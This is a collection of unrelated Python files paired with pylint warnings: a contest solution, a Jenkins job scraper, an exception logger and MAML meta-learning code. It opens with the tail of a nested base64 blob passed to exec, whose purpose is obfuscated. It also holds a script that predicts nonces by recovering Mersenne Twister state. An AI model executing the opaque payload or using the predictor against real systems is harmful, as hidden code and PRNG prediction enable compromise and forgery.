TJScllrWktlVlpITlZOVlJtUkpVV3MxV21KWVRYZFVWbHB6VG14U2MxUnRiRk5OU0VKV1ZqSndTMk14WkhKTldGWm9VMFUxV1ZadE1XOVRNV3hYVm1wQ1ZtRjZSa2RhUldSelZHc3hSVkpZYUZoWFNFSlFXWHBLVjJSR1ZuSmhSbVJwWWtWd1RsWldVa05rTWxKSFlrWmtZVkl6VW5GVVZtaERWMnhhVjFwSGRGWk5WWEJZVlRKd1MxZHJNSGxsUlZKV1ZucEdWRlV4V2xka1IwWkhZMFUxYVdGNlZqTldXSEJIVW0xUmVGUlliRlZoTW5oVldXMTBTMk5HYkhSbFJXUlZUVlZXTlZSc1ZrOWlSbGwzVjJ4c1ZXSkdTa1JWTW5oR1pESk9SbFJ0UmxOaVYyaFZWMWR3UzFOdFZuTlViR2hoVWxoQ1UxUlZWbFpsVmxWNFZteGtWazFXUmpOWmExWmhWR3hhY2xOc1VsWmlWRUV4V1RCYVMxSXhTblZhUjNST1lYcFZkMWRYZEc5V01rVjRVbGhrVTJKclNsaFVWbVJPVFZaU1YxWnVUbE5OVmxwNFZXMTRkMkZXV25OWGJsWlhVa1Z3ZWxWVVJrdFdNVloxVVd4S2FHVnNXbGRXUmxaaFV6SkdSMVJzYUZwTk1sSlZWRmR6TVZOc1ZYbE9WVTVvVmpCd2VsVnRNREZXUmxsNlZXMW9XbFpXY0hsYVZscGhaRWRLU0dKRk5XaGlXR2N4VmxSR1YxVXlVWGhYYTJScFVtMW9WMVpxU2xOV01WSldWbTVPYVdKRk5WbFhWRTVyVmtVeGNrNVZjRlpOYWxaRVdWWmtTMk14U25KUFZrcE9ZV3RhTmxkclVrTmpNVXBXVFZWb1lWSXpRbkJXYkZwelRteFpkMVZyZEdwTmJFcFpWa2QwYzFZeVJuSlRhekZXVmtWS00xVjZSbUZXYkZKeVZHeGtWMkpZYUdGV1ZFbDNUVlpzVjFwRlpGTmlWRlpXVkZjeE5GRXhiRmRXYWtKV1lYcEdSMXBGWkhkVk1sWjBaSHBHV0dFeFdsQlZWM00xVm0xS1JtRkhiRlJTYkhCNFZsUkNZVmR0VVhoVVdHUlZZVE5TVjFacVFuTk9iRlY1WTBWT1ZHSkZWak5WYlRBeFZrWmFWazVWVGxoaGEwcDZWV3hrU21WV2NFWmpSMmhYVFRGS1VWWldVa3RoYlZGNFZGaHNWRmRJUWxaV01GcGhZMVpTVlZOcVVrOWlTRUpIVjJ0YWEyRXhTbGxWYTFaV1RXcEdNMWxXV2twbFJtUjBUMVp3VG1KWWFFeFhWRUpYVlRGV2RGUnJiRmhpV0VKelZtdGFXazFzWkhOWGJUbFZUVVJHU0Zrd1dtOVViRW8yWWtWMFdtSkdjRE5hUkVaclkxWk9jVlZ0YkZOTlZYQkdWbFprTUZNeVJYaFVhMlJVWWxSc1dWWnJWbmRPYkdSeFVteGFiR0pHV2pCWlZXUjNZVmRLUm1ORVRsaFdla0kwV1ZjeFIxWnRVa2RUYXpWVFYwWktlRlpVUWxka01sRjRZa2hTVDFacmNHaFVWV1EwWld4c05sTnRkRlJpUlZZelZXMHdNVlpHV2xaT1ZVNVlZV3RLZWxWcldrZFhSbkJHWTBaS1RsSldjREZXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZuUmpSVTVwWWtaS1YxWkhlR0ZaVlRGSVpVaFdWVlpXV1hkWlZFWktaVmRXUlZGc2FHbFNWRUkwVjJ4amVGTXhUa2RYYmxKc1VqTkNVMVJYTVU5T1JsWTJVbXRhYTAxVk1UVldSM1J6VmtkS2NsTnVRbHBpV0doSVdXMTRUMWRIVmtsalJrSlhZVEJ3VjFaR1ZsTmpNVlpYVmxoa1UySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYVVGVlhlSFprTWtwR1drVTFVMDFzU2xCWFZtUTBWakpOZUZSc2FGcE5NbEpWVkZkNFMxTldiSEpoUms1YVZteFpNbFp0Y0dGWGJVVjVWV3hvV21FeVVsQlZhMXAzVG14S2NtVkdXbGRTVlhCT1ZqRlNRMkl4VFhsVWEyaFVZbXhhVjFacVNsTlRNV3h5WVVVMVQxWnNXa2hXVm1oclZVWmFjbE5zV2xWV1ZrcDZWbFphWVZKV1JsVldiRkpYVmxSV1JGWXljRU5qTVVwSFVteG9ZVkpZUWxOVVZWWmhaRlpWZUZac2NHdE5Wemt6Vkd4YVYxVnNXWHBoUlhSWVltNUNSRlpGV25kU2JIQkpWRzEwVTJKclNsWldSM2h2WkRKR1YxTllhRmhpYXpWaFZGVlZNV1JXVWxkV2FrSldZWHBHUjFwRlpIZFdSa3BaVVdwT1dGWjZRWGhXVjNoMlpESktTVlJ0Y0d4aVdHaFRWbTEwVTFGck5WZFdhMlJXVjBkU1VWWnRkRXRXYkZKV1ZXNU9WbFpzY0VaVlZsSlhWbXhLYzFKcVRsaGhhMHA2Vld0YVIxZEdjRVpqUms1b1lUQndNVlpyWXpGa01WcDBVMnRhYVZKNlZrOVZiR2hUWTJ4V2NWTnFVazVTYlZKNlZrWlNSMkpIU2xaalJXeFhZbFJGTUZsWGVFWmxWbXQ2WVVaU1RsWldXWHBXV0hCTFZERk9WMVJ1VmxKaVYzaHdXV3RXWVdSV1ZYaGFSRkpzWVhwc1dGVlhlRmRVYkVwSVpVWktWMkV4U2tOVWJGcFhVakZXV1ZwR1FsZGhNSEJYVmtaV1UyTXhWbGRYYTFaU1ZrWmFWMVZ0ZUVkTk1WRjRWMnRPVjAxRVJrbFhhMVV4VmpGS1ZsZFljRlpOYm1oUVZUSjRVMk5zVW5WV2JGcHBZVEJ3ZDFadGNFZFdNREZYWWtSYVZHRnNTbkJWYlRWRFYyeFdWMWw2VmxWaVZscFpXa1ZWTlZWck1YRldiRUphWVRKU1RGcEdXbGRYUm5CSFVteGFUbEpXYkRaV1YzUmhVakpSZDAxSWJGTmhNbWh3VlRCVk1XRkdXbFZSYTNSWFlrZDBOVlJzV210aFZrcFZZa2hXVlZaV1dYZFZNbmhHWkRGS2RFNVdVbGRXVkZaRlYyeGplRk50VmxkVmJsWlVZWHBHY0ZsWWNGZGxiR1JZVFVob1ZrMUVSa2xWTW5CWFlVWkplV1ZJVGxkTlJuQk1XWHBHY21WdFNrVlViVVpPVTBaS1NsZFhkRzloTVZKWFZHdGFWR0ZyY0dGVVYzQlhWVEZyZDFacVFsWmhla1pIV2tWV2QxVnJNVVpYYmxaV1RWWmFVRlZVU2xkak1rNUhZVVU1VjFKVmNFeFdWM1JUVVRKS2MySkVXbFJpUjFKeVZtcEdTMUpXVmxkaFJYUlVZa1Z3UjFadGN6VlZhekYwWlVWT1dHRnJTbnBWYTFwSFYwWndTR05HVG14aVdHTjRWakowVjFReFJuSlBWbHBwVWxkNFUxbHRlSGRqVm14MFpVVmthV0pGTVRaWmExWkxZa1pLVjFOc1RscGhhM0J5VlRKNFJtUXhTblJPVmxKWFZqSm9SVmRzV210U01XUkdUbFpXVW1FelFsTlVWV2hEVm14WmVXVkhjRTVXVkVaSFdXdFdVMVl5U25WUmEzUldUVVphVEZscVJtdFdWazV4VVcxc1UwMVZjRVpXVm1SM1VUSkdXRlpzV2xOaWF6VmhWRlJLTkZKR1VsWmFSV1JVVm1zMU1WWXlNVEJXTURGelUycEtXR0V4V2xCVlZFcFNaVlpPV1dOR1VtaGhNSEJTVjFaYVlWbFZOWE5VYkdocFVteHdjRlJYYzNoT1ZscDBUbFprYUUxVlZqWlpWV2hyVjJzeFJrNUVRbUZTUlhCTFdsZDRUMk5XUm5KbFJscFhVbFZ3VGxaVVJsZFVNVVp6WWpOa2FWSldTbE5aYlhSTFlVWnNWMVpyZEU1TlYzaDRWa2QwTUZSc1NsaGxSVnBWVmxaS2VsVXllRXRTTWtWNllVWldhVkpyY0ZCV1JsWldUbGRLY2sxVldtdFNXRUpUVkZWV1lXUldWWGhXYXpsU1lrYzVNMWxyVm5OVmJVcHpZMGhHV21KWWFFaFpiWGhYVWpGU2NsTnRlRkpOUjNnelZYcEdSazlXUWxSVFdFSk1WVlF3T1VscGEzQWlLU2s9Iikp"))")) | 12 - warning: exec-used
|
1 # your code goes here
2 import collections
3 T = int(input())
4 print (T)
5 while T>0:
6 n,g,m = map(int,input().split())
7 print (n,g,m)
8 dict = collections.defaultdict(set)
9 c = 1 ### guest no.
10 t = 1
11 li = [-1]
12 while c <=g:
13 h,direction = input().split()
14 print (h,direction)
15 h = int(h)
16 #h,direction = astr.split()
17 li.append((h,direction))
18 dict[h].add(c)
19 print (dict)
20 c+=1
21
22 while t<=m:
23 c = 1
24 temp_d = collections.defaultdict(set)
25 while c<=g:
26 h,direction = li[c]
27 h = int(h)
28 if direction == 'C':
29 end = (h+1)%n
30 else:
31 end = (h-1)
32 if end<=0: ####3
33 end = n+end
34 temp_d[end].add(c)
35 c+=1
36 for i,v in temp_d.items():
37 dict[i].union(v)
38 ################
39 t+=1
40
41 dict2 = collections.OrderedDict()
42 for i,v in dict.items():
43 for elem in v:
44 if elem not in dict2:
45 dict2[elem]=1
46 else:
47 dict2[elem]+=1
48 li1 = []
49 print (dict2)
50 for i in range(g+1):
51 if i+1 in dict2:
52 li1.append(dict2[i+1])
53
54 print (li1)
55 T-=1
| 37 - warning: bad-indentation
8 - warning: redefined-builtin
|
1 #!/usr/bin/python3
2 import os
3 main_nonce="nonce"
4 obj_file_new_nonce="obj_new_nonce_624"
5 cmd_cut='cat nonce | tail -312 > obj_nonce_312'
6 nonce_combined_list=[]
7
8 def split_nonce():
9
10 os.system(cmd_cut) #This block will cut 312 nonce from main file and put in last nonce_312
11 file_nonce="obj_nonce_312"
12
13 with open(file_nonce, "r") as file: # Calculate hi and lo 32 bit of 64 bit nonce.
14 for line in file.readlines():
15 line=int(line)
16 highint = line >> 32 #hi
17 lowint = line & 0xffffffff #lo
18
19 with open (obj_file_new_nonce, 'a') as file: #Add nonces to a new file making it 624 values.
20 file.write(str(lowint)+'\n')
21
22 with open(obj_file_new_nonce, 'a') as file:
23 file.write(str(highint)+'\n')
24
25
26 def predict():
27 try:
28 os.system('cat obj_new_nonce_624 | mt19937predict | head -20 > obj_pred_10.txt') # Using Kmyk's Mersenne twister Predictor
29 except Exception as e: # This will through a broken pipe exception but it will successfully predict 10 next nonces
30 pass
31
32 with open('obj_pred_10.txt', 'r') as file:
33 nonce_array = file.readlines()
34 for i,j in zip(range(0,len(nonce_array),2), range(129997,130007)):
35 # if i <len(nonce_array)-1:
36 nonce_lo=int(nonce_array[i]) # Converting back to 64 bit.
37 nonce_hi=int(nonce_array[i+1])
38 nonce_combined=(nonce_hi <<32) + nonce_lo
39 hex_nonce=hex(nonce_combined)
40 print("Predicted nonce at",j,"is:", nonce_combined, " [ Hex value:",hex_nonce,"]") #Printing the nones and their hex value
41
42 split_nonce()
43 predict()
44
45
46
47
48
| 10 - warning: bad-indentation
11 - warning: bad-indentation
13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
13 - warning: unspecified-encoding
19 - warning: unspecified-encoding
22 - warning: unspecified-encoding
29 - warning: broad-exception-caught
32 - warning: unspecified-encoding
29 - warning: unused-variable
|
1 import requests
2 import jenkins
3 from sqlalchemy import *
4 from sqlalchemy.ext.declarative import declarative_base
5 from sqlalchemy.orm import sessionmaker
6 import datetime
7
8 Base = declarative_base()
9
10 def connectToJenkins(url, username, password):
11
12 server = jenkins.Jenkins(url,
13 username=username, password=password)
14 return server
15
16 def initializeDb():
17 engine = create_engine('sqlite:///cli.db', echo=False)
18 session = sessionmaker(bind=engine)()
19 Base.metadata.create_all(engine)
20 return session
21
22 def addJob(session, jlist):
23 for j in jlist:
24 session.add(j)
25 session.commit()
26
27 def getLastJobId(session, name):
28 job = session.query(Jobs).filter_by(name=name).order_by(Jobs.jen_id.desc()).first()
29 if (job != None):
30 return job.jen_id
31 else:
32 return None
33
34 class Jobs(Base):
35 __tablename__ = 'Jobs'
36
37 id = Column(Integer, primary_key = True)
38 jen_id = Column(Integer)
39 name = Column(String)
40 timeStamp = Column(DateTime)
41 result = Column(String)
42 building = Column(String)
43 estimatedDuration = Column(String)
44
45 def createJobList(start, lastBuildNumber, jobName):
46 jList = []
47 for i in range(start + 1, lastBuildNumber + 1):
48 current = server.get_build_info(jobName, i)
49 current_as_jobs = Jobs()
50 current_as_jobs.jen_id = current['id']
51 current_as_jobs.building = current['building']
52 current_as_jobs.estimatedDuration = current['estimatedDuration']
53 current_as_jobs.name = jobName
54 current_as_jobs.result = current['result']
55 current_as_jobs.timeStamp = datetime.datetime.fromtimestamp(long(current['timestamp'])*0.001)
56 jList.append(current_as_jobs)
57 return jList
58
59
60 url = 'http://locahost:8080'
61 username = input('Enter username: ')
62 password = input('Enter password: ')
63 server = connectToJenkins(url, username, password)
64
65 authenticated = false
66 try:
67 server.get_whoami()
68 authenticated = true
69 except jenkins.JenkinsException as e:
70 print ("Authentication error")
71 authenticated = false
72
73 if authenticated:
74 session = initializeDb()
75
76 # get a list of all jobs
77 jobs = server.get_all_jobs()
78 for j in jobs:
79 jobName = j['name'] # get job name
80 #print jobName
81 lastJobId = getLastJobId(session, jobName) # get last locally stored job of this name
82 lastBuildNumber = server.get_job_info(jobName)['lastBuild']['number'] # get last build number from Jenkins for this job
83
84 # if job not stored, update the db with all entries
85 if lastJobId == None:
86 start = 0
87 # if job exists, update the db with new entrie
88 else:
89 start = lastJobId
90
91 # create a list of unadded job objects
92 jlist = createJobList(start, lastBuildNumber, jobName)
93 # add job to db
94 addJob(session, jlist)
| 3 - warning: wildcard-import
10 - warning: redefined-outer-name
10 - warning: redefined-outer-name
10 - warning: redefined-outer-name
12 - warning: redefined-outer-name
18 - warning: redefined-outer-name
17 - error: undefined-variable
22 - warning: redefined-outer-name
22 - warning: redefined-outer-name
23 - warning: redefined-outer-name
27 - warning: redefined-outer-name
29 - refactor: no-else-return
37 - error: undefined-variable
37 - error: undefined-variable
38 - error: undefined-variable
38 - error: undefined-variable
39 - error: undefined-variable
39 - error: undefined-variable
40 - error: undefined-variable
40 - error: undefined-variable
41 - error: undefined-variable
41 - error: undefined-variable
42 - error: undefined-variable
42 - error: undefined-variable
43 - error: undefined-variable
43 - error: undefined-variable
34 - refactor: too-few-public-methods
45 - warning: redefined-outer-name
45 - warning: redefined-outer-name
45 - warning: redefined-outer-name
55 - error: undefined-variable
65 - error: undefined-variable
68 - error: undefined-variable
71 - error: undefined-variable
1 - warning: unused-import
|
1 from datetime import datetime
2 import os
3 from sys import __excepthook__
4 from time import time
5 from traceback import format_exception
6
7
8 BASE_DIR = os.path.realpath(os.path.dirname(__file__))
9
10 def log_exception(type, value, tb):
11 error = format_exception(type, value, tb)
12 filepath = os.path.join(BASE_DIR, 'error.log')
13 old_text = '\n'
14 if os.path.isfile(filepath):
15 with open(filepath, 'r') as logfile:
16 old_text += logfile.read()
17 timestamp = datetime.fromtimestamp(time()).strftime('%Y-%m-%d %H:%M:%S')
18 line = f'[{timestamp}]\n{("".join(error))}'
19 new_text = line + old_text
20 with open(filepath, 'w+') as logfile:
21 logfile.write(new_text)
22
23 __excepthook__(type, value, tb)
| 10 - warning: redefined-builtin
15 - warning: unspecified-encoding
20 - warning: unspecified-encoding
|
1 """
2 Command-line argument parsing.
3 """
4
5 import argparse
6 #from functools import partial
7
8 import time
9 import tensorflow as tf
10 import json
11 import os
12
13 def boolean_string(s):
14 if s not in {'False', 'True'}:
15 raise ValueError('Not a valid boolean string')
16 return s == 'True'
17
18 def argument_parser():
19 """
20 Get an argument parser for a training script.
21 """
22 file_time = int(time.time())
23 parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
24 parser.add_argument('--arch', help='name architecture', default="fcn", type=str)
25 parser.add_argument('--seed', help='random seed', default=0, type=int)
26 parser.add_argument('--name', help='name add-on', type=str, default='Model_config-'+str(file_time))
27 parser.add_argument('--dataset', help='data set to evaluate on', type=str, default='Omniglot')
28 parser.add_argument('--data_path', help='path to data folder', type=str, default='/home/')
29 parser.add_argument('--config', help='json config file', type=str, default=None)
30 parser.add_argument('--checkpoint', help='checkpoint directory', default='model_checkpoint')
31 parser.add_argument('--test', help='Testing or Not', action='store_true')
32 parser.add_argument('--testintrain', help='Testing during train or Not', action='store_true')
33 parser.add_argument('--min_classes', help='minimum number of classes for n-way', default=2, type=int)
34 parser.add_argument('--max_classes', help='maximum (excluded) number of classes for n-way', default=2, type=int)
35 parser.add_argument('--ttrain_shots', help='number of examples per class in meta train', default=5, type=int)
36 parser.add_argument('--ttest_shots', help='number of examples per class in meta test', default=15, type=int)
37 parser.add_argument('--etrain_shots', help='number of examples per class in meta train', default=5, type=int)
38 parser.add_argument('--etest_shots', help='number of examples per class in meta test', default=15, type=int)
39 parser.add_argument('--train_inner_K', help='number of inner gradient steps during meta training', default=5, type=int)
40 parser.add_argument('--test_inner_K', help='number of inner gradient steps during meta testing', default=5, type=int)
41 parser.add_argument('--learning_rate', help='Adam step size for inner training', default=0.4, type=float)
42 parser.add_argument('--meta_step', help='meta-training step size', default=0.01, type=float)
43 parser.add_argument('--meta_batch', help='meta-training batch size', default=1, type=int)
44 parser.add_argument('--meta_iters', help='meta-training iterations', default=70001, type=int)
45 parser.add_argument('--eval_iters', help='meta-training iterations', default=2000, type=int)
46 parser.add_argument('--step', help='Checkpoint step to load', default=59999, type=float)
47 # python main_emb.py --meta_step 0.005 --meta_batch 8 --learning_rate 0.3 --test --checkpoint Model_config-1568818723
48
49 args = vars(parser.parse_args())
50 #os.system("mkdir -p " + args['checkpoint'])
51 if args['config'] is None:
52 args['config'] = f"{args['checkpoint']}/{args['name']}/{args['name']}.json"
53 print(args['config'])
54 # os.system("mkdir -p " + f"{args['checkpoint']}")
55 os.system("mkdir -p " + f"{args['checkpoint']}/{args['name']}")
56 with open(args['config'], 'w') as write_file:
57 print("Json Dumping...")
58 json.dump(args, write_file)
59 else:
60 with open(args['config'], 'r') as open_file:
61 args = json.load(open_file)
62 return parser
63
64 def train_kwargs(parsed_args):
65 """
66 Build kwargs for the train() function from the parsed
67 command-line arguments.
68 """
69 return {
70 'min_classes': parsed_args.min_classes,
71 'max_classes': parsed_args.max_classes,
72 'train_shots': parsed_args.ttrain_shots,
73 'test_shots': parsed_args.ttest_shots,
74 'meta_batch': parsed_args.meta_batch,
75 'meta_iters': parsed_args.meta_iters,
76 'test_iters': parsed_args.eval_iters,
77 'train_step' : parsed_args.step,
78 'name': parsed_args.name,
79
80 }
81
82 def test_kwargs(parsed_args):
83 """
84 Build kwargs for the train() function from the parsed
85 command-line arguments.
86 """
87 return {
88 'eval_step' : parsed_args.step,
89 'min_classes': parsed_args.min_classes,
90 'max_classes': parsed_args.max_classes,
91 'train_shots': parsed_args.etrain_shots,
92 'test_shots': parsed_args.etest_shots,
93 'meta_batch': parsed_args.meta_batch,
94 'meta_iters': parsed_args.eval_iters,
95 'name': parsed_args.name,
96
97 } | 56 - warning: unspecified-encoding
60 - warning: unspecified-encoding
9 - warning: unused-import
|
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import os
5 import numpy as np
6 import tensorflow as tf
7 from archs.maml import MAML
8 class Model(MAML):
9 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2):
10 super().__init__(train_lr,meta_lr,image_shape,isMIN,label_size)
11
12 def dense_weights(self):
13 weights = {}
14 cells = {}
15 initializer = tf.contrib.layers.xavier_initializer()
16 print("Creating/loading Weights")
17 divider = 1
18 inic = 1
19 filters = 64
20 finals = 64
21 if self.isMIN:
22 divider = 2
23 inic = 3
24 finals = 800
25 filters = 32
26 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
27 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer)
28 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer)
29 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer)
30 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer)
31 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant)
32 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant)
33 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant)
34 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant)
35 weights['d_1'] = tf.get_variable('d_1w', [finals,self.label_size], initializer = initializer)
36 weights['b_1'] = tf.get_variable('d_1b', [self.label_size], initializer=tf.initializers.constant)
37
38 """weights['mean'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
39 weights['variance'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
40 weights['offset'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
41 weights['scale'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
42
43 weights['mean1'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
44 weights['variance1'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
45 weights['offset1'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
46 weights['scale1'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
47
48 weights['mean2'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
49 weights['variance2'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
50 weights['offset2'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
51 weights['scale2'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
52
53 weights['mean3'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
54 weights['variance3'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
55 weights['offset3'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
56 weights['scale3'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )"""
57 print("Done Creating/loading Weights")
58 return weights, cells
59
60 def forward(self,x,weights, training):
61 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1")
62 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE)
63 conv1 = tf.nn.relu(conv1)
64 conv1 = tf.layers.MaxPooling2D(2,2)(conv1)
65
66 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2")
67 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE)
68 conv2 = tf.nn.relu(conv2)
69 conv2 = tf.layers.MaxPooling2D(2,2)(conv2)
70
71 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3")
72 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE)
73 conv3 = tf.nn.relu(conv3)
74 conv3 = tf.layers.MaxPooling2D(2,2)(conv3)
75
76 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4")
77 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE)
78 conv4 = tf.nn.relu(conv4)
79 conv4 = tf.layers.MaxPooling2D(2,2)(conv4)
80 # print(conv4)
81 # bn = tf.squeeze(conv4,axis=(1,2))
82 bn = tf.layers.Flatten()(conv4)
83 # tf.reshape(bn, [3244,234])
84
85 fc1 = self.fc_layer(bn,"dense1",weights["d_1"],weights["b_1"])
86 # bn = tf.reshape(bn,[-1,])
87 return fc1 | 9 - warning: useless-parent-delegation
9 - refactor: too-many-arguments
9 - refactor: too-many-positional-arguments
38 - warning: pointless-string-statement
17 - warning: unused-variable
60 - warning: unused-argument
4 - warning: unused-import
5 - warning: unused-import
|
1 import numpy as np
2 import tensorflow as tf
3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
4
5 def test(m, data_sampler,
6 eval_step,
7 min_classes,
8 max_classes,
9 train_shots,
10 test_shots,
11 meta_batch,
12 meta_iters,
13 name):
14
15 sess = tf.Session()
16 sess.run(tf.global_variables_initializer())
17 losses=[]
18
19 temp_yp = []
20 aps = []
21 buffer = []
22 lossesB=[]
23
24 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test")
25 print("TEST MODE")
26 m.loadWeights(sess, name, step = str(int(eval_step)), model_name=name+".ckpt")
27 for i in range(meta_iters):
28 xb1,yb1,xb2,yb2 = next(train_gen)
29 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
30
31 if m.maml_n == 2:
32 sess.run(m.init_assign, feed_dict={m.label_n:[5]})
33 l,vals,ps=sess.run([m.test_train_loss,m.test_val_losses,m.val_predictions],feed_dict={m.train_xb: xb1,
34 m.train_yb: yb1,
35 m.val_xb:xb2,
36 m.val_yb:yb2,
37 m.label_n:num_l})
38
39 losses.append(vals)
40 lossesB.append(vals)
41 buffer.append(l)
42
43 true_vals = np.argmax(yb2,axis=-1)
44 all_accs = []
45 for pred_epoch in range(len(ps)):
46 all_accs.append(np.mean(np.argmax(ps[pred_epoch],axis=-1)==true_vals))
47 temp_yp.append(all_accs)
48
49
50 # if i%1==0:
51 if i%50==0:
52 print(f"({i}/{meta_iters})")
53 print(f"Final: TLoss {np.mean(buffer)}, VLoss {np.mean(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}" )
54 print(f"Final: TLoss {np.mean(buffer)}-{np.std(buffer)}, VLoss {np.mean(lossesB,axis=0)}-{np.std(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}-{np.std(temp_yp,axis=0)}" )
55
| 46 - warning: bad-indentation
5 - refactor: too-many-arguments
5 - refactor: too-many-positional-arguments
5 - refactor: too-many-locals
20 - warning: unused-variable
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
|
1 ## Created by Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
5 from archs.fcn import Model as mfcn
6 from archs.hydra import Model as mhyd
7 from train import *
8 from test import *
9 from args import argument_parser, train_kwargs, test_kwargs
10 import random
11
12 args = argument_parser().parse_args()
13 random.seed(args.seed)
14 t_args = train_kwargs(args)
15 e_args = test_kwargs (args)
16
17 print("########## argument sheet ########################################")
18 for arg in vars(args):
19 print (f"#{arg:>15} : {str(getattr(args, arg))} ")
20 print("##################################################################")
21
22 print("Loading Data...")
23 if args.dataset in ["Omniglot", "omniglot", "Omni", "omni"]:
24 loader = OmniChar_Gen (args.data_path)
25 isMIN = False
26 shaper = [28,28,1]
27 elif args.dataset in ["miniimagenet", "MiniImageNet", "mini"]:
28 loader = MiniImgNet_Gen(args.data_path)
29 isMIN = True
30 shaper = [84,84,3]
31 else:
32 raise ValueError("INVALID DATA-SET NAME!")
33
34 print("Building Model...")
35 if args.arch == "fcn"or args.arch == "maml":
36 print("SELECTED: MAML")
37 m = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
38 mt = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
39 #elif args.arch == "rnn":
40 # m = mrnn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.min_classes)
41 elif args.arch == "hydra" or args.arch == "hidra":
42 print("SELECTED: HIDRA")
43 m = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
44 mt = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes)
45 else:
46 raise ValueError("INVALID Architecture NAME!")
47
48 mode = "train"
49 if args.test:
50 mode = "test"
51 print("Starting Test Step...")
52 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode=mode)
53 test (mt, loader, **e_args)
54 else:
55 modeltest = None
56 if args.testintrain:
57 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode="test")
58 modeltest = mt
59 print("Starting Train Step...")
60 m.build (K = args.train_inner_K, meta_batchsz = args.meta_batch, mode=mode)
61 train(m, modeltest, loader, **t_args)
| 7 - warning: wildcard-import
8 - warning: wildcard-import
35 - refactor: consider-using-in
41 - refactor: consider-using-in
53 - error: undefined-variable
61 - error: undefined-variable
4 - warning: unused-import
|
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import os
5 import numpy as np
6 import tensorflow as tf
7
8 class MAML:
9 def __init__(self,train_lr,meta_lr,image_shape, isMIN, label_size=2):
10 self.train_lr = train_lr
11 self.meta_lr = meta_lr
12 self.image_shape = image_shape
13 self.isMIN = isMIN
14 self.saver = None
15 self.label_size = label_size
16 self.finals = 64
17 self.maml_n = 1
18 if isMIN:
19 self.finals = 800
20 def build(self, K, meta_batchsz, mode='train'):
21
22 # Meta batch of tasks
